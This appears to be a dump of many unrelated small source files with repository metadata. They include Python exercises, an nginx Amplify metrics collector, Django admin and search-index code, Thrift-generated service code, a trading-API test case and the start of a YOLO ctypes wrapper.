dd6083a2196d9bae36bb66bf12a2bdc07a0b93e8
|
5a806668c3bfc0d9750421c4ae287f19cbf36fc7
|
refs/heads/master
| 2022-11-13T11:07:13.875607 | 2020-06-29T03:51:17 | 2020-06-29T03:51:17 | 275,724,898 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 361 |
py
|
import re
print('Example: 1 2 3 4 5')
numbers = input('Enter list of numbers separate with space:')
pattern = r'^[0-9\s]+$'
check_multi = re.findall(pattern, numbers)
if not check_multi:
print('Please enter valid format')
else:
total = numbers.split(' ')
product = 1
for i in total:
i = int(i)
product *= i
print(product)
|
[
"[email protected]"
] | |
06c23408811bd37ee1ea076d37ef63244b96f858
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_155/945.py
|
a43e4458d2b1f38b912356b2ce0d2242713cfb2c
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 647 |
py
|
def nombre_ami(b):
debout = 0
ami = 0
compteur = 0
ami_en_plus = 0
for chiffre in b:
if compteur > debout:
ami_en_plus = (compteur - debout)
ami += ami_en_plus
debout += ami_en_plus
debout += int(chiffre)
compteur += 1
return str(ami)
def solution_jam1():
source = open("D:/Download/test.txt","r")
output = open("D:/Download/jam1long.txt","w")
liste = source.readline()
liste = liste.split('\n')
for i in range(int(liste[0])):
liste = source.readline()
liste = liste.split()
output.write('Case #'+str(i+1)+': '+nombre_ami(liste[1])+'\n')
output.close()
source.close()
solution_jam1()
|
[
"[email protected]"
] | |
e00d864ccd59cb04d2832d0d8da60884622e3044
|
b2de5660d81afdf6b1fba058faee6ece6a51e462
|
/amplify/agent/collectors/plus/upstream.py
|
ebd305b92eb648c9fd3ca9fc2b1bc0b84eb905e5
|
[
"BSD-2-Clause"
] |
permissive
|
Ferrisbane/nginx-amplify-agent
|
725d8a7da7fb66e0b41cddd8139d25a084570592
|
ef769934341374d4b6ede5fcf5ebff34f6cba8de
|
refs/heads/master
| 2021-01-22T00:03:49.686169 | 2016-07-20T17:50:30 | 2016-07-20T17:50:30 | 63,801,713 | 0 | 0 | null | 2016-07-20T17:41:25 | 2016-07-20T17:41:25 | null |
UTF-8
|
Python
| false | false | 3,982 |
py
|
# -*- coding: utf-8 -*-
from amplify.agent.collectors.plus.util import upstream
from amplify.agent.common.context import context
from amplify.agent.collectors.plus.abstract import PlusStatusCollector
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__credits__ = ["Mike Belov", "Andrei Belov", "Ivan Poluyanov", "Oleg Mamontov", "Andrew Alexeev", "Grant Hulegaard", "Arie van Luttikhuizen"]
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "[email protected]"
class UpstreamCollector(PlusStatusCollector):
short_name = 'plus_upstream'
def collect(self):
try:
tuples = self.gather_data()
for data, stamp in tuples:
# workaround for supporting old N+ format
# http://nginx.org/en/docs/http/ngx_http_status_module.html#compatibility
peers = data['peers'] if 'peers' in data else data
for peer in peers:
# This loop will aggregate all peer metrics as a single "upstream" entity.
for method in (
self.active_connections,
self.upstream_request,
self.upstream_header_time,
self.upstream_response_time,
self.upstream_responses,
self.upstream_bytes,
self.upstream_fails,
self.upstream_health_checks,
self.upstream_queue,
self.upstream_peer_count
):
try:
method(peer, stamp)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream peer metrics %s due to %s' %
(method.__name__, exception_name)
)
context.log.debug('additional info:', exc_info=True)
try:
self.increment_counters()
self.finalize_latest()
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to increment n+ upstream counters due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream metrics due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
def active_connections(self, data, stamp):
upstream.collect_active_connections(self, data, stamp)
def upstream_request(self, data, stamp):
upstream.collect_upstream_request(self, data, stamp)
def upstream_header_time(self, data, stamp):
upstream.collect_upstream_header_time(self, data, stamp)
def upstream_response_time(self, data, stamp):
upstream.collect_upstream_response_time(self, data, stamp)
def upstream_responses(self, data, stamp):
upstream.collect_upstream_responses(self, data, stamp)
def upstream_bytes(self, data, stamp):
upstream.collect_upstream_bytes(self, data, stamp)
def upstream_fails(self, data, stamp):
upstream.collect_upstream_fails(self, data, stamp)
def upstream_health_checks(self, data, stamp):
upstream.collect_upstream_health_checks(self, data, stamp)
def upstream_queue(self, data, stamp):
upstream.collect_upstream_queue(self, data, stamp)
def upstream_peer_count(self, data, stamp):
upstream.collect_upstream_peer_count(self, data, stamp)
|
[
"[email protected]"
] | |
b4cff199f29e741f20b31e5e5f92df6fd15d82ab
|
d200a54adcec3a254a909b9689f925c1614f6fb1
|
/backend/core/admin.py
|
a526227756b4d1de8a88c8269f99a134351a5779
|
[] |
no_license
|
shusaku-ishikawa/binance
|
1bbe7f4aaf32c0ade4f67da7a4c1972f414bfa19
|
60bad0848fa4f4666e2476117a79ee8452326ed1
|
refs/heads/master
| 2022-01-27T01:35:24.038917 | 2019-11-30T12:42:36 | 2019-11-30T12:42:36 | 204,909,653 | 0 | 1 | null | 2022-01-15T05:20:54 | 2019-08-28T10:50:13 |
JavaScript
|
UTF-8
|
Python
| false | false | 2,304 |
py
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
from .models import *
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.conf import settings
from django.utils.safestring import mark_safe
class MyUserChangeForm(UserChangeForm):
class Meta:
model = User
fields = '__all__'
class MyUserCreationForm(UserCreationForm):
class Meta:
model = User
fields = ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb' )
class MyUserAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password')}),
(_('Personal info'), {'fields': ()}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email','api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password1', 'password2'),
}),
)
form = MyUserChangeForm
add_form = MyUserCreationForm
list_display = ('email', 'api_key','api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'is_staff',)
search_fields = ('email',)
ordering = ('email',)
class SymbolAdmin(admin.ModelAdmin):
#list_display = [field.name for field in Symbol._meta.get_fields()]
list_display = ['symbol', 'from_currency', 'to_currency', 'side']
class OrderSequenceAdmin(admin.ModelAdmin):
list_display = ['t1', 't2', 't3']
class OrderAdmin(admin.ModelAdmin):
list_display = ['symbol', 'order_id', 'quantity', 'quote_quantity', 'price', 'time', 'status']
class OrderSequenceResultAdmin(admin.ModelAdmin):
list_display = ['master', 't1_result', 't2_result', 't3_result', 'profit']
admin.site.register(User, MyUserAdmin)
admin.site.register(Symbol, SymbolAdmin)
admin.site.register(OrderSequence, OrderSequenceAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(OrderSequenceResult, OrderSequenceResultAdmin)
|
[
"[email protected]"
] | |
4d5c0786be25e6910e4ce018e76c712744d39dae
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/74/usersdata/197/40006/submittedfiles/lecker.py
|
2e27da6fdd494d21fc5e283193a357ccb803379a
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 449 |
py
|
# -*- coding: utf-8 -*-
import math
a=int(input('Digite o valor do número a:'))
b=int(input('Digite o valor do número b:'))
c=int(input('Digite o valor do número c:'))
d=int(input('Digite o valor do número d:'))
if a>b and b<c and c>d:
print('N')
elif a==b==c==d:
print('N')
elif a<b and b>c and c<d:
print('N')
elif a>b and b<c and c<d:
print('N')
elif a==b==c>=d and a<b==c==d and a==b<c==d:
print('N')
else:
print('S')
|
[
"[email protected]"
] | |
a85eca58f0c19dea7674254798bcf77bb60ed9b8
|
a882ccf759025735f926695d6a5a39937854646a
|
/e_step4/pygame00.py
|
a91f3f96979ff338f83cd1d55dc042ebde65d456
|
[] |
no_license
|
muzudho/practice-open-cv2
|
5c1534564bcf43c2d8f7a6fb4ee1583bd77337f9
|
55af5cfb37587b08123b404cf8768d83148cb046
|
refs/heads/main
| 2023-07-08T02:23:22.984816 | 2021-08-10T10:45:01 | 2021-08-10T10:45:01 | 349,864,518 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,820 |
py
|
"""coding: utf -8
"""
# モジュールの読み込み
import sys
import time
import pygame
from pygame.locals import QUIT
# pygame の初期化
pygame.init()
# 画像の読み込み
# FRAME_COUNT = 380
FRAME_COUNT = 528
#FRAME_COUNT = 960
# FRAME_COUNT = 4560
#FRAME_COUNT = 1520
FPS = 8 # 例えば 15 フレームで撮影するなら、ゲーム画面はその半分の FPS ならコマ飛びを感じないぐらい
IMAGE1 = pygame.image.load('./@share/out-cstep4-0.png')
IMAGE1_W = IMAGE1.get_width() # 画像の横幅の取得
IMAGE1_H = IMAGE1.get_height() # 画像の高さの取得
DISPLAY_SIZE = (IMAGE1_W, IMAGE1_H) # width, height
SURFACE = pygame.display.set_mode(DISPLAY_SIZE) # アプリケーションウィンドウ
pygame.display.set_caption('Application: pygame00.py')
CLOCK = pygame.time.Clock() # フレームレート制御のための Clock オブジェクト
# 画像の先読み
FRAMES = []
for i in range(0, FRAME_COUNT):
IMAGE1 = pygame.image.load(f'./@share/out-cstep4-{i}.png')
FRAMES.append(IMAGE1)
# メインループ
WHITE = (255, 255, 255)
TOP_LEFT_P = (0, 0) # x, y
for j in range(0, 1): # 1ループ # 2ループ
for i in range(0, FRAME_COUNT):
# SURFACE.fill(WHITE) # 背景の色
SURFACE.blit(FRAMES[i], TOP_LEFT_P) # ボールの描画
# イベントキューを処理するループ
for ev in pygame.event.get():
if ev.type == QUIT: # 「終了」イベント
pygame.quit()
print('quitting...')
sys.exit()
# ディスプレイの更新
pygame.display.update()
if j == 0 and i == 0:
time.sleep(3) # Seconds
# フレームレートの設定
CLOCK.tick(FPS) # fps を指定
time.sleep(3) # Seconds
|
[
"[email protected]"
] | |
b85a75aeafda4547a9db1b598e1d8f93af10c136
|
3b628230666e2324b325d29ed8997a905dcba291
|
/web/views/report.py
|
17aff5f6356ae5632f81eedc4114595ae36f8fbe
|
[] |
no_license
|
emohamed/obshtestvo.bg
|
9f67734776ecdef5dfc5238a9caabd97c5e80cbd
|
b90c547a880294cc84956eb926413fb7118be133
|
refs/heads/master
| 2020-12-25T20:30:38.667603 | 2016-01-06T16:44:33 | 2016-01-06T16:46:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 238 |
py
|
from django.views.generic.base import View
from restful.decorators import restful_view_templates
@restful_view_templates
class ReportView(View):
def get(self, request):
return {
"page": "inner report",
}
|
[
"[email protected]"
] | |
77bf3568089d84dca57ebccf21f5df9caf089b6b
|
c1a9436f38714277b063d76af47e8b9448d5cc73
|
/CRO/Molecule.py
|
25eaa41d932d1644507e279a2297edc8bc7924ea
|
[] |
no_license
|
rakib06/LearnPythonBasic
|
83f5bf5c63a40e8d5f93ac3ffa0d0443fdc0519a
|
fc0b81850e76d38c6816bd9fe81b442b68d6bd75
|
refs/heads/master
| 2020-09-01T01:03:49.087763 | 2019-12-25T23:11:09 | 2019-12-25T23:11:09 | 218,835,593 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 620 |
py
|
def spin_words(sentence):
my_list = sentence.split()
result = ''
for i in range(len(my_list)):
x = my_list[i]
if len(x) >= 5:
x = x[::-1]
if i != 0:
result = result + ' ' + x
else:
result += x
return result
s = 'rettel rettel Kata than in etirW than desrever the in gnirts gnirts'
def spin_word_kata(sentence):
return " ".join([x[::-1] if len(x)>=5 else x for x in sentence.split()])
print(spin_word_kata(s))
my_list = ['hello', 'how', 'are', 'you']
print(' '.join(my_list), end='\n')
print(' '.join([x[::-1] if x != 'you' else x for x in my_list]))
|
[
"[email protected]"
] | |
d6c42962c8c27b0253171b232edbef46fb681496
|
b1182238bf0d26451d567e3100cea940be771ff1
|
/hd-thrift-idl/hd-thrift-idl-social/src/main/python/SocialAdminService/ISocialAdminServiceDeleteAdminPost.py
|
2ea38cd7fffadcfa9fbbd5dc18012fea42a09f4d
|
[] |
no_license
|
ybg555/vue-tvBox
|
af6df0e07848efc1c2ac80ee8b7c16c65b790a40
|
57e3849e7f8272794e5a38d5e49bb68f7a44f286
|
refs/heads/master
| 2021-01-15T15:42:23.728423 | 2016-10-02T09:36:08 | 2016-10-02T09:36:08 | 55,936,790 | 1 | 0 | null | 2016-04-12T01:07:09 | 2016-04-11T02:52:05 |
Python
|
UTF-8
|
Python
| false | true | 6,833 |
py
|
#coding=utf-8
#
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def deleteAdminPost(self, post):
"""
删除帖子
@param post
@return
@author zhijian.li
Parameters:
- post
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def deleteAdminPost(self, post):
"""
删除帖子
@param post
@return
@author zhijian.li
Parameters:
- post
"""
self.send_deleteAdminPost(post)
return self.recv_deleteAdminPost()
def send_deleteAdminPost(self, post):
self._oprot.writeMessageBegin('deleteAdminPost', TMessageType.CALL, self._seqid)
args = deleteAdminPost_args()
args.post = post
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deleteAdminPost(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = deleteAdminPost_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteAdminPost failed: unknown result");
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["deleteAdminPost"] = Processor.process_deleteAdminPost
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_deleteAdminPost(self, seqid, iprot, oprot):
args = deleteAdminPost_args()
args.read(iprot)
iprot.readMessageEnd()
result = deleteAdminPost_result()
result.success = self._handler.deleteAdminPost(args.post)
oprot.writeMessageBegin("deleteAdminPost", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class deleteAdminPost_args:
"""
Attributes:
- post
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'post', (TAdminPost.ttypes.TAdminPost, TAdminPost.ttypes.TAdminPost.thrift_spec), None, ), # 1
)
def __init__(self, post=None,):
self.post = post
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.post = TAdminPost.ttypes.TAdminPost()
self.post.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteAdminPost_args')
if self.post is not None:
oprot.writeFieldBegin('post', TType.STRUCT, 1)
self.post.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.post)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteAdminPost_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteAdminPost_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
|
[
"[email protected]"
] | |
4ea78129b575c0fa392a02973b2e72fc68d1979c
|
c37414be07a423968c897887b0844830e349741f
|
/fastestimator/backend/to_number.py
|
766952ad187cb9f583dbacd315fbeb6d65a050c5
|
[
"Apache-2.0"
] |
permissive
|
vbvg2008/fastestimator-future
|
5175047a1acac42f7172f8b9bb326486ed25a5a0
|
dbf7d597d1f97140f837345f6b06f1773d4fa299
|
refs/heads/master
| 2022-03-30T22:48:59.349348 | 2020-01-06T08:35:04 | 2020-01-06T08:35:04 | 227,687,532 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 214 |
py
|
import tensorflow as tf
import torch
def to_number(data):
if isinstance(data, tf.Tensor):
data = data.numpy()
elif isinstance(data, torch.Tensor):
data = data.data.numpy()
return data
|
[
"[email protected]"
] | |
bed9cb10f6453c7018cc7f08aefc7153fb29f8cd
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/ETFMM_K/YW_ETFMM_SZSJ_408_K.py
|
1bed5c3ce3bd01583d66e471f4a5c2ac987176e2
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,088 |
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_ETFMM_SZSJ_408_K(xtp_test_case):
# YW_ETFMM_SZSJ_408_K
def test_YW_ETFMM_SZSJ_408_K(self):
title = '深圳A股股票交易日五档即成转撤销委托卖-错误的业务类型'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '废单',
'errorID': 11000370,
'errorMSG': queryOrderErrorMsg(11000370),
'是否生成报单': '否',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('999999', '2', '14', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_IPOS'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_CANCEL'],
'price': stkparm['随机中间价'],
'quantity': 200,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
9c1513fc38a50fa093602c41444c8be32727345d
|
f47fe8a7d8cd87b3bfa2e172b4a9fc93e3a4abc2
|
/2015/AST1/vezbovni/David/habl.py
|
1b759c2b4f14d8433cbff56e9e18ac1feecb3585
|
[] |
no_license
|
ispastlibrary/Titan
|
a4a7e4bb56544d28b884a336db488488e81402e0
|
f60e5c6dc43876415b36ad76ab0322a1f709b14d
|
refs/heads/master
| 2021-01-17T19:23:32.839966 | 2016-06-03T13:47:44 | 2016-06-03T13:47:44 | 60,350,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 298 |
py
|
import numpy as np
#import matplot.pyplot as plt
d, V, wi, deltav = np.loadtxt(habl.txt, unpac=True)
sum_wi = np.sum(wi)
sum_wy = np.sum()
sum_wx = np.sum()
sum_wxy = np.sum(wi*d*V)
sum_wx2 = no.sum(wi*d*d)
b = (sum_wxy * sum_wi -sum_wy * sum_wx) / (sum_wi * sum_wx2 - (sum_wx)**2)
print(b)
|
[
"[email protected]"
] | |
b91fb546cbb42329ea80e0be279d6f298648f0d1
|
848cf2c39afe417272ce96d738266995cb0c9ca1
|
/jirani/tests.py
|
4c8d790627ab1c565880f05b726771f4c571271d
|
[
"MIT"
] |
permissive
|
cliffnyendwe/neighbourhood
|
462c2d13d966745de6c63675e799e57cf412eca8
|
77e1a1a082a94fb5a883012a66bf2a4504e6d33b
|
refs/heads/master
| 2020-04-14T05:41:39.902621 | 2019-01-14T08:10:40 | 2019-01-14T08:10:40 | 163,369,785 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 716 |
py
|
from django.test import TestCase
# Create your tests here.
from django.test import TestCase
from django.contrib.auth.models import User
from .models import Neighborhood , Profile , Business
class TestUser(TestCase):
def setUp(self):
self.testuser = User(username="user", email="[email protected]")
def test_instance(self):
self.assertIsInstance(self.testuser, User)
def test_save_user(self):
self.assertFalse(self.testuser in User.objects.all())
self.testuser.save()
self.assertTrue(self.testuser in User.objects.all())
def test_save_profile(self):
self.fuser = User(username="fuser", email="[email protected]")
self.fuser.save()
|
[
"cliffnyendwe"
] |
cliffnyendwe
|
02de053f7a35ad14f7c9469e279ff827159d5414
|
904bf81488ce47c93453a8a841403e831f03ebe0
|
/tx_lobbying/search_indexes.py
|
edb9f8e6255ec97382048159f312a5a1398c6c77
|
[
"Apache-2.0"
] |
permissive
|
texastribune/tx_lobbying
|
b7b26ed8acb6059f46bf1e4285af69398795b074
|
81dd911667e5368b874a56d5fba8e1613f7027ee
|
refs/heads/master
| 2020-04-01T09:25:11.457807 | 2015-05-19T03:34:53 | 2015-05-19T03:34:53 | 7,674,962 | 1 | 3 | null | 2015-05-28T03:08:54 | 2013-01-17T21:47:06 |
Python
|
UTF-8
|
Python
| false | false | 920 |
py
|
"""
Haystack search indicies.
I denormalize thing here to try and make things easier on the database later.
"""
from haystack import indexes
from .models import Lobbyist, Interest
class LobbyistIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='name', document=True)
content_auto = indexes.EdgeNgramField(model_attr='name')
url = indexes.CharField()
def get_model(self):
return Lobbyist
def get_updated_field(self):
return 'updated_at'
def prepare_url(self, obj):
return obj.get_absolute_url()
class InterestIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='name', document=True)
content_auto = indexes.EdgeNgramField(model_attr='name')
url = indexes.CharField()
def get_model(self):
return Interest
def prepare_url(self, obj):
return obj.get_absolute_url()
|
[
"[email protected]"
] | |
3dab6d251c6ac13c212ea60b449bf66fc68e4008
|
48d86947d5f3b5896c4a05cfcddcff01582a26ef
|
/amnesia/task/migrations/0002_auto_20170504_2027.py
|
1792df7727f51e01362639cf36de2a20b7de1620
|
[] |
no_license
|
pratulyab/amnesia
|
181874288c97fbf7e73d10c64e214c2a17574773
|
6b0b3428a27f98e0e2f6bb8aefdc8a4459e7b8cc
|
refs/heads/master
| 2021-01-20T12:49:16.592335 | 2017-05-07T20:38:06 | 2017-05-07T20:38:06 | 90,409,855 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 908 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-05-04 20:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('task', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='task',
name='every',
field=models.CharField(choices=[('15', '15 minutes'), ('30', '30 minutes'), ('45', '45 minutes'), ('0', '60 minutes')], default='0', help_text='Repeat every', max_length=2),
),
migrations.AlterField(
model_name='task',
name='sleep_cycle',
field=models.CharField(choices=[('4-19', '8pm - 4am'), ('5-20', '9pm - 5am'), ('6-21', '10pm - 6am'), ('7-22', '11pm - 7am'), ('8-23', '12pm - 8am')], default='4-19', help_text='Assuming 8 hours sleep cycle', max_length=5),
),
]
|
[
"[email protected]"
] | |
7f611c84c8e4bd5fbd87fdfe6e15165d7275e17f
|
f7bdda5ce6026e30f8d2258499d066cec0a9bf6a
|
/detect_object.py
|
03a40e8e061ac0b96d172f6b950f5f922d728bb4
|
[] |
no_license
|
AbhishekBose/yolo_docker
|
cfb3e3fe3dda8092771f614bdd9ce3ea022435e1
|
1377a73b38a95cfdde37ddc215a6f90ecbd407b0
|
refs/heads/master
| 2022-06-25T21:14:51.702133 | 2019-12-15T15:30:19 | 2019-12-15T15:30:19 | 228,206,788 | 10 | 10 | null | 2022-06-01T20:54:18 | 2019-12-15T15:29:53 |
Python
|
UTF-8
|
Python
| false | false | 5,336 |
py
|
#%%
from ctypes import *
import random
import argparse
import os
import traceback
import cv2
import functools
import numpy as np
import time
import sys
import imutils
#%%
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
libdarknet_path = os.path.join("/home/darknet/libdarknet.so")
